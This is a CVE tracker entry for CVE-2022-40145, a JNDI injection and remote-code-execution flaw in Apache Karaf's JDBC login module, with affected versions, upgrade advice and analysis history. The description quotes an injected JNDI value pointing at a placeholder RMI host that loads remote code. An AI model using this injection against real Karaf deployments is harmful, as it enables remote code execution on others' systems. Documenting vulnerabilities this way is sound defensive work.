CVE-2022-40145

CVSS V2 None CVSS V3 None
Description
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
Overview
  • CVE ID
  • CVE-2022-40145
  • Assigner
  • security@apache.org
  • Vulnerability Status
  • Analyzed
  • Published Version
  • 2022-12-21T16:15:08
  • Last Modified Date
  • 2022-12-28T19:25:07
CPE Configuration (Product)
CPE Vulnerable Operator Version Start Version End
cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* 1 OR 4.3.8
cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* 1 OR 4.4.0 4.4.2
References
History
Created Old Value New Value Data Type Notes
2022-12-21 16:15:39 Added to TrackCVE
2022-12-21 16:15:40 Weakness Enumeration new
2022-12-21 18:16:53 2022-12-21T18:08:08 CVE Modified Date updated
2022-12-21 18:16:53 Received Awaiting Analysis Vulnerability Status updated
2022-12-23 11:15:12 Awaiting Analysis Undergoing Analysis Vulnerability Status updated
2022-12-28 20:14:46 2022-12-28T19:25:07 CVE Modified Date updated
2022-12-28 20:14:46 Undergoing Analysis Analyzed Vulnerability Status updated
2022-12-28 20:14:50 Weakness Enumeration update
2022-12-28 20:14:51 CPE Information updated